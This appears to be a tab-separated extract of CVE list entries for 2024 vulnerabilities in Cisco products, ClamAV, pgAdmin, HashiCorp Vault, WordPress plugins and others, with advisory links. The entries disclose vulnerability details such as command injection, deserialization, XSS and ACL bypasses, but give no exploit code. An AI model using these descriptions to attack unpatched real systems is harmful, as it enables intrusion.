CVE    2024    2049    Candidate    Server-Side Request Forgery (SSRF) in Citrix SD-WAN Standard/Premium Editions on or after 11.4.0 and before 11.4.4.46 allows an attacker to disclose limited information from the appliance via Access to management IP.    MISC:https://support.citrix.com/article/CTX617071/citrix-sdwan-security-bulletin-for-cve20242049   |   URL:https://support.citrix.com/article/CTX617071/citrix-sdwan-security-bulletin-for-cve20242049    Assigned (20240301)
CVE    2024    2048    Candidate    Vault and Vault Enterprise (“Vault”) TLS certificate auth method did not correctly validate client certificates when configured with a non-CA certificate as trusted certificate. In this configuration, an attacker may be able to craft a malicious certificate that could be used to bypass authentication. Fixed in Vault 1.15.5 and 1.14.10.    MISC:https://discuss.hashicorp.com/t/hcsec-2024-05-vault-cert-auth-method-did-not-correctly-validate-non-ca-certificates/63382   |   URL:https://discuss.hashicorp.com/t/hcsec-2024-05-vault-cert-auth-method-did-not-correctly-validate-non-ca-certificates/63382    Assigned (20240301)
CVE    2024    2045    Candidate    Session version 1.17.5 allows obtaining internal application files and public files from the user's device without the user's consent. This is possible because the application is vulnerable to Local File Read via chat attachments.    MISC:https://fluidattacks.com/advisories/newman/   |   URL:https://fluidattacks.com/advisories/newman/   |   MISC:https://github.com/oxen-io/session-android/   |   URL:https://github.com/oxen-io/session-android/    Assigned (20240229)
CVE    2024    2044    Candidate    pgAdmin <= 8.3 is affected by a path-traversal vulnerability while deserializing users’ sessions in the session handling code. If the server is running on Windows, an unauthenticated attacker can load and deserialize remote pickle objects and gain code execution. If the server is running on POSIX/Linux, an authenticated attacker can upload pickle objects, deserialize them, and gain code execution.    FEDORA:FEDORA-2024-15df3b6d95   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LUYN2JXKKHFSVTASH344TBRGWDH64XQV/   |   MISC:https://github.com/pgadmin-org/pgadmin4/issues/7258   |   URL:https://github.com/pgadmin-org/pgadmin4/issues/7258   |   MISC:https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/   |   URL:https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/    Assigned (20240229)
CVE    2024    2042    Candidate    The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Accordion widget in all versions up to, and including, 3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.0.4/widgets/image-accordion/image-accordion.php#L962   |   URL:https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.0.4/widgets/image-accordion/image-accordion.php#L962   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050248%40elementskit-lite&new=3050248%40elementskit-lite&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050248%40elementskit-lite&new=3050248%40elementskit-lite&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/be4ce3e6-8baa-419f-a48e-4256c306fbc1?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/be4ce3e6-8baa-419f-a48e-4256c306fbc1?source=cve    Assigned (20240229)
CVE    2024    20346    Candidate    A vulnerability in the web-based management interface of Cisco AppDynamics Controller could allow an authenticated, remote attacker to perform a reflected cross-site scripting (XSS) attack against a user of the interface of an affected device. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.    MISC:cisco-sa-appd-xss-3JwqSMNT   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-appd-xss-3JwqSMNT    Assigned (20231108)
CVE    2024    20345    Candidate    A vulnerability in the file upload functionality of Cisco AppDynamics Controller could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to access sensitive data on an affected device.    MISC:cisco-sa-appd-traversal-m7N8mZpF   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-appd-traversal-m7N8mZpF    Assigned (20231108)
CVE    2024    20344    Candidate    A vulnerability in system resource management in Cisco UCS 6400 and 6500 Series Fabric Interconnects that are in Intersight Managed Mode (IMM) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on the Device Console UI of an affected device. This vulnerability is due to insufficient rate-limiting of TCP connections to an affected device. An attacker could exploit this vulnerability by sending a high number of TCP packets to the Device Console UI. A successful exploit could allow an attacker to cause the Device Console UI process to crash, resulting in a DoS condition. A manual reload of the fabric interconnect is needed to restore complete functionality.    MISC:cisco-sa-ucsfi-imm-syn-p6kZTDQC   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucsfi-imm-syn-p6kZTDQC    Assigned (20231108)
CVE    2024    20338    Candidate    A vulnerability in the ISE Posture (System Scan) module of Cisco Secure Client for Linux could allow an authenticated, local attacker to elevate privileges on an affected device. This vulnerability is due to the use of an uncontrolled search path element. An attacker could exploit this vulnerability by copying a malicious library file to a specific directory in the filesystem and persuading an administrator to restart a specific process. A successful exploit could allow the attacker to execute arbitrary code on an affected device with root privileges.    MISC:cisco-sa-secure-privesc-sYxQO6ds   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-secure-privesc-sYxQO6ds    Assigned (20231108)
CVE    2024    20337    Candidate    A vulnerability in the SAML authentication process of Cisco Secure Client could allow an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link while establishing a VPN session. A successful exploit could allow the attacker to execute arbitrary script code in the browser or access sensitive, browser-based information, including a valid SAML token. The attacker could then use the token to establish a remote access VPN session with the privileges of the affected user. Individual hosts and services behind the VPN headend would still need additional credentials for successful access.    MISC:cisco-sa-secure-client-crlf-W43V4G7   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-secure-client-crlf-W43V4G7    Assigned (20231108)
CVE    2024    20336    Candidate    A vulnerability in the web-based user interface of Cisco Small Business 100, 300, and 500 Series Wireless APs could allow an authenticated, remote attacker to perform buffer overflow attacks against an affected device. In order to exploit this vulnerability, the attacker must have valid administrative credentials for the device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system.    MISC:cisco-sa-sb-wap-multi-85G83CRB   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-wap-multi-85G83CRB    Assigned (20231108)
CVE    2024    20335    Candidate    A vulnerability in the web-based management interface of Cisco Small Business 100, 300, and 500 Series Wireless APs could allow an authenticated, remote attacker to perform command injection attacks against an affected device. In order to exploit this vulnerability, the attacker must have valid administrative credentials for the device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system.    MISC:cisco-sa-sb-wap-multi-85G83CRB   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-wap-multi-85G83CRB    Assigned (20231108)
CVE    2024    20328    Candidate    A vulnerability in the VirusEvent feature of ClamAV could allow a local attacker to inject arbitrary commands with the privileges of the application service account. The vulnerability is due to unsafe handling of file names. A local attacker could exploit this vulnerability by supplying a file name containing command-line sequences. When processed on a system using configuration options for the VirusEvent feature, the attacker could cause the application to execute arbitrary commands. ClamAV has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.    MISC:https://blog.clamav.net/2023/11/clamav-130-122-105-released.html   |   URL:https://blog.clamav.net/2023/11/clamav-130-122-105-released.html    Assigned (20231108)
CVE    2024    20327    Candidate    A vulnerability in the PPP over Ethernet (PPPoE) termination feature of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, adjacent attacker to crash the ppp_ma process, resulting in a denial of service (DoS) condition. This vulnerability is due to the improper handling of malformed PPPoE packets that are received on a router that is running Broadband Network Gateway (BNG) functionality with PPPoE termination on a Lightspeed-based or Lightspeed-Plus-based line card. An attacker could exploit this vulnerability by sending a crafted PPPoE packet to an affected line card interface that does not terminate PPPoE. A successful exploit could allow the attacker to crash the ppp_ma process, resulting in a DoS condition for PPPoE traffic across the router.    MISC:cisco-sa-iosxr-pppma-JKWFgneW   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-pppma-JKWFgneW    Assigned (20231108)
CVE    2024    20325    Candidate    A vulnerability in the Live Data server of Cisco Unified Intelligence Center could allow an unauthenticated, local attacker to read and modify data in a repository that belongs to an internal service on an affected device. This vulnerability is due to insufficient access control implementations on cluster configuration CLI requests. An attacker could exploit this vulnerability by sending a cluster configuration CLI request to specific directories on an affected device. A successful exploit could allow the attacker to read and modify data that is handled by an internal service on the affected device.    MISC:cisco-sa-cuic-access-control-jJsZQMjj   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuic-access-control-jJsZQMjj    Assigned (20231108)
CVE    2024    20322    Candidate    A vulnerability in the access control list (ACL) processing on Pseudowire interfaces in the ingress direction of Cisco IOS XR Software could allow an unauthenticated, remote attacker to bypass a configured ACL. This vulnerability is due to improper assignment of lookup keys to internal interface contexts. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access resources behind the affected device that were supposed to be protected by a configured ACL.    MISC:cisco-sa-iosxr-acl-bypass-RZU5NL3e   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-acl-bypass-RZU5NL3e    Assigned (20231108)
CVE    2024    20321    Candidate    A vulnerability in the External Border Gateway Protocol (eBGP) implementation of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability exists because eBGP traffic is mapped to a shared hardware rate-limiter queue. An attacker could exploit this vulnerability by sending large amounts of network traffic with certain characteristics through an affected device. A successful exploit could allow the attacker to cause eBGP neighbor sessions to be dropped, leading to a DoS condition in the network.    MISC:cisco-sa-nxos-ebgp-dos-L3QCwVJ   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-ebgp-dos-L3QCwVJ    Assigned (20231108)
CVE    2024    20320    Candidate    A vulnerability in the SSH client feature of Cisco IOS XR Software for Cisco 8000 Series Routers and Cisco Network Convergence System (NCS) 540 Series and 5700 Series Routers could allow an authenticated, local attacker to elevate privileges on an affected device. This vulnerability is due to insufficient validation of arguments that are included with the SSH client CLI command. An attacker with low-privileged access to an affected device could exploit this vulnerability by issuing a crafted SSH client command to the CLI. A successful exploit could allow the attacker to elevate privileges to root on the affected device.    MISC:cisco-sa-iosxr-ssh-privesc-eWDMKew3   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-ssh-privesc-eWDMKew3    Assigned (20231108)
CVE    2024    20319    Candidate    A vulnerability in the UDP forwarding code of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to bypass configured management plane protection policies and access the Simple Network Management Protocol (SNMP) server of an affected device. This vulnerability is due to incorrect UDP forwarding programming when using SNMP with management plane protection. An attacker could exploit this vulnerability by attempting to perform an SNMP operation using broadcast as the destination address that could be processed by an affected device that is configured with an SNMP server. A successful exploit could allow the attacker to communicate to the device on the configured SNMP ports. Although an unauthenticated attacker could send UDP datagrams to the configured SNMP port, only an authenticated user can retrieve or modify data using SNMP requests.    MISC:cisco-sa-snmp-uhv6ZDeF   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-uhv6ZDeF    Assigned (20231108)
CVE    2024    20318    Candidate    A vulnerability in the Layer 2 Ethernet services of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause the line card network processor to reset, resulting in a denial of service (DoS) condition. This vulnerability is due to the incorrect handling of specific Ethernet frames that are received on line cards that have the Layer 2 services feature enabled. An attacker could exploit this vulnerability by sending specific Ethernet frames through an affected device. A successful exploit could allow the attacker to cause the ingress interface network processor to reset, resulting in a loss of traffic over the interfaces that are supported by the network processor. Multiple resets of the network processor would cause the line card to reset, resulting in a DoS condition.    MISC:cisco-sa-xrl2vpn-jesrU3fc   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xrl2vpn-jesrU3fc    Assigned (20231108)
CVE    2024    20315    Candidate    A vulnerability in the access control list (ACL) processing on MPLS interfaces in the ingress direction of Cisco IOS XR Software could allow an unauthenticated, remote attacker to bypass a configured ACL. This vulnerability is due to improper assignment of lookup keys to internal interface contexts. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access resources behind the affected device that were supposed to be protected by a configured ACL.    MISC:cisco-sa-iosxr-acl-bypass-RZU5NL3e   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-acl-bypass-RZU5NL3e    Assigned (20231108)
CVE    2024    2031    Candidate    The Video Conferencing with Zoom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zoom_recordings_by_meeting' shortcode in all versions up to, and including, 4.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3048838/video-conferencing-with-zoom-api/trunk/includes/Shortcodes/Recordings.php   |   URL:https://plugins.trac.wordpress.org/changeset/3048838/video-conferencing-with-zoom-api/trunk/includes/Shortcodes/Recordings.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/06e48355-6932-4401-8787-e6432444930f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/06e48355-6932-4401-8787-e6432444930f?source=cve    Assigned (20240229)
CVE    2024    20305    Candidate    A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.    MISC:cisco-sa-cuc-xss-9TFuu5MS   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuc-xss-9TFuu5MS    Assigned (20231108)
CVE    2024    20301    Candidate    A vulnerability in Cisco Duo Authentication for Windows Logon and RDP could allow an authenticated, physical attacker to bypass secondary authentication and access an affected Windows device. This vulnerability is due to a failure to invalidate locally created trusted sessions after a reboot of the affected device. An attacker with primary user credentials could exploit this vulnerability by attempting to authenticate to an affected device. A successful exploit could allow the attacker to access the affected device without valid permissions.    MISC:cisco-sa-duo-win-bypass-pn42KKBm   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-duo-win-bypass-pn42KKBm    Assigned (20231108)
CVE    2024    2030    Candidate    The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/contact-form-entries.php   |   URL:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/contact-form-entries.php   |   MISC:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/templates/leads-table.php   |   URL:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/templates/leads-table.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3046066/   |   URL:https://plugins.trac.wordpress.org/changeset/3046066/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4528b63-8d8e-44a4-a71f-2ad1636ac93c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4528b63-8d8e-44a4-a71f-2ad1636ac93c?source=cve    Assigned (20240229)
CVE    2024    20294    Candidate    A vulnerability in the Link Layer Discovery Protocol (LLDP) feature of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper handling of specific fields in an LLDP frame. An attacker could exploit this vulnerability by sending a crafted LLDP packet to an interface of an affected device and having an authenticated user retrieve LLDP statistics from the affected device through CLI show commands or Simple Network Management Protocol (SNMP) requests. A successful exploit could allow the attacker to cause the LLDP service to crash and stop running on the affected device. In certain situations, the LLDP crash may result in a reload of the affected device. Note: LLDP is a Layer 2 link protocol. To exploit this vulnerability, an attacker would need to be directly connected to an interface of an affected device, either physically or logically (for example, through a Layer 2 Tunnel configured to transport the LLDP protocol).    MISC:cisco-sa-nxos-lldp-dos-z7PncTgt   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-lldp-dos-z7PncTgt    Assigned (20231108)
CVE    2024    20292    Candidate    A vulnerability in the logging component of Cisco Duo Authentication for Windows Logon and RDP could allow an authenticated, local attacker to view sensitive information in clear text on an affected system. This vulnerability is due to improper storage of an unencrypted registry key in certain logs. An attacker could exploit this vulnerability by accessing the logs on an affected system. A successful exploit could allow the attacker to view sensitive information in clear text.    MISC:cisco-sa-duo-infodisc-rLCEqm6T   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-duo-infodisc-rLCEqm6T    Assigned (20231108)
CVE    2024    20291    Candidate    A vulnerability in the access control list (ACL) programming for port channel subinterfaces of Cisco Nexus 3000 and 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to send traffic that should be blocked through an affected device. This vulnerability is due to incorrect hardware programming that occurs when configuration changes are made to port channel member ports. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access network resources that should be protected by an ACL that was applied on port channel subinterfaces.    MISC:cisco-sa-nxos-po-acl-TkyePgvL   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-po-acl-TkyePgvL    Assigned (20231108)
CVE    2024    20290    Candidate    A vulnerability in the OLE2 file format parser of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to an incorrect check for end-of-string values during scanning, which may result in a heap buffer over-read. An attacker could exploit this vulnerability by submitting a crafted file containing OLE2 content to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to terminate, resulting in a DoS condition on the affected software and consuming available system resources. For a description of this vulnerability, see the ClamAV blog.    FEDORA:FEDORA-2024-3439911df6   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5FXZYVDNV66RNMNVJOHAJAYRZV4U64CQ/   |   FEDORA:FEDORA-2024-c42cf0e576   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6MUDUPAHAAV6FPB2C2QIQCFJ4SHYBOTY/   |   MISC:cisco-sa-clamav-hDffu6t   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-clamav-hDffu6t    Assigned (20231108)
CVE    2024    20287    Candidate    A vulnerability in the web-based management interface of the Cisco WAP371 Wireless-AC/N Dual Radio Access Point (AP) with Single Point Setup could allow an authenticated, remote attacker to perform command injection attacks against an affected device. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the device. To exploit this vulnerability, the attacker must have valid administrative credentials for the device.    MISC:cisco-sa-sb-wap-inject-bHStWgXO   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-wap-inject-bHStWgXO    Assigned (20231108)
CVE    2024    2028    Candidate    The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Covid-19 Stats Widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor   |   URL:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d44ecf8a-d19a-403a-96c7-89e223a5cc22?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d44ecf8a-d19a-403a-96c7-89e223a5cc22?source=cve    Assigned (20240229)
CVE    2024    20277    Candidate    A vulnerability in the web-based management interface of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root. This vulnerability is due to insufficient validation of user-supplied input for the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP packet to the affected device. A successful exploit could allow the attacker to execute arbitrary commands and elevate privileges to root.    MISC:cisco-sa-thouseyes-privesc-DmzHG3Qv   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-thouseyes-privesc-DmzHG3Qv    Assigned (20231108)
CVE    2024    20272    Candidate    A vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system and execute commands on the underlying operating system. This vulnerability is due to a lack of authentication in a specific API and improper validation of user-supplied data. An attacker could exploit this vulnerability by uploading arbitrary files to an affected system. A successful exploit could allow the attacker to store malicious files on the system, execute arbitrary commands on the operating system, and elevate privileges to root.    MISC:cisco-sa-cuc-unauth-afu-FROYsCsD   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuc-unauth-afu-FROYsCsD    Assigned (20231108)
CVE    2024    20270    Candidate    A vulnerability in the web-based management interface of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.    MISC:cisco-sa-broadworks-xss-6syj82Ju   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-broadworks-xss-6syj82Ju    Assigned (20231108)
CVE    2024    20267    Candidate    A vulnerability with the handling of MPLS traffic for Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause the netstack process to unexpectedly restart, which could cause the device to stop processing network traffic or to reload. This vulnerability is due to lack of proper error checking when processing an ingress MPLS frame. An attacker could exploit this vulnerability by sending a crafted IPv6 packet that is encapsulated within an MPLS frame to an MPLS-enabled interface of the targeted device. A successful exploit could allow the attacker to cause a denial of service (DoS) condition. Note: The IPv6 packet can be generated multiple hops away from the targeted device and then encapsulated within MPLS. The DoS condition may occur when the NX-OS device processes the packet.    MISC:cisco-sa-ipv6-mpls-dos-R9ycXkwM   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipv6-mpls-dos-R9ycXkwM    Assigned (20231108)
CVE    2024    20266    Candidate    A vulnerability in the DHCP version 4 (DHCPv4) server feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to trigger a crash of the dhcpd process, resulting in a denial of service (DoS) condition. This vulnerability exists because certain DHCPv4 messages are improperly validated when they are processed by an affected device. An attacker could exploit this vulnerability by sending a malformed DHCPv4 message to an affected device. A successful exploit could allow the attacker to cause a crash of the dhcpd process. While the dhcpd process is restarting, which may take approximately two minutes, DHCPv4 server services are unavailable on the affected device. This could temporarily prevent network access to clients that join the network during that time period and rely on the DHCPv4 server of the affected device. Notes: Only the dhcpd process crashes and eventually restarts automatically. The router does not reload. This vulnerability only applies to DHCPv4. DHCP version 6 (DHCPv6) is not affected.    MISC:cisco-sa-iosxr-dhcp-dos-3tgPKRdm   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-dhcp-dos-3tgPKRdm    Assigned (20231108)
CVE    2024    20263    Candidate    A vulnerability with the access control list (ACL) management within a stacked switch configuration of Cisco Business 250 Series Smart Switches and Business 350 Series Managed Switches could allow an unauthenticated, remote attacker to bypass protection offered by a configured ACL on an affected device. This vulnerability is due to incorrect processing of ACLs on a stacked configuration when either the primary or backup switches experience a full stack reload or power cycle. An attacker could exploit this vulnerability by sending crafted traffic through an affected device. A successful exploit could allow the attacker to bypass configured ACLs, causing traffic to be dropped or forwarded in an unexpected manner. The attacker does not have control over the conditions that result in the device being in the vulnerable state. Note: In the vulnerable state, the ACL would be correctly applied on the primary devices but could be incorrectly applied to the backup devices.    MISC:cisco-sa-sb-bus-acl-bypass-5zn9hNJk   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-bus-acl-bypass-5zn9hNJk    Assigned (20231108)
CVE    2024    20262    Candidate    A vulnerability in the Secure Copy Protocol (SCP) and SFTP feature of Cisco IOS XR Software could allow an authenticated, local attacker to create or overwrite files in a system directory, which could lead to a denial of service (DoS) condition. The attacker would require valid user credentials to perform this attack. This vulnerability is due to a lack of proper validation of SCP and SFTP CLI input parameters. An attacker could exploit this vulnerability by authenticating to the device and issuing SCP or SFTP CLI commands with specific parameters. A successful exploit could allow the attacker to impact the functionality of the device, which could lead to a DoS condition. The device may need to be manually rebooted to recover. Note: This vulnerability is exploitable only when a local user invokes SCP or SFTP commands at the Cisco IOS XR CLI. A local user with administrative privileges could exploit this vulnerability remotely.    MISC:cisco-sa-iosxr-scp-dos-kb6sUUHw   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-scp-dos-kb6sUUHw    Assigned (20231108)
CVE    2024    20255    Candidate    A vulnerability in the SOAP API of Cisco Expressway Series and Cisco TelePresence Video Communication Server could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected system. An attacker could exploit this vulnerability by persuading a user of the REST API to follow a crafted link. A successful exploit could allow the attacker to cause the affected system to reload.    MISC:cisco-sa-expressway-csrf-KnnZDMj3   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-csrf-KnnZDMj3    Assigned (20231108)
CVE    2024    20254    Candidate    Multiple vulnerabilities in Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an unauthenticated, remote attacker to conduct cross-site request forgery (CSRF) attacks that perform arbitrary actions on an affected device. Note: "Cisco Expressway Series" refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices. For more information about these vulnerabilities, see the Details section of this advisory.    MISC:cisco-sa-expressway-csrf-KnnZDMj3   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-csrf-KnnZDMj3    Assigned (20231108)
CVE    2024    20253    Candidate    A vulnerability in multiple Cisco Unified Communications and Contact Center Solutions products could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to the improper processing of user-provided data that is being read into memory. An attacker could exploit this vulnerability by sending a crafted message to a listening port of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user. With access to the underlying operating system, the attacker could also establish root access on the affected device.    MISC:cisco-sa-cucm-rce-bWNzQcUm   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-rce-bWNzQcUm    Assigned (20231108)
CVE    2024    20251    Candidate    A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to perform a stored cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.    MISC:cisco-sa-ISE-XSS-bL4VTML   |   URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ISE-XSS-bL4VTML    Assigned (20231108)
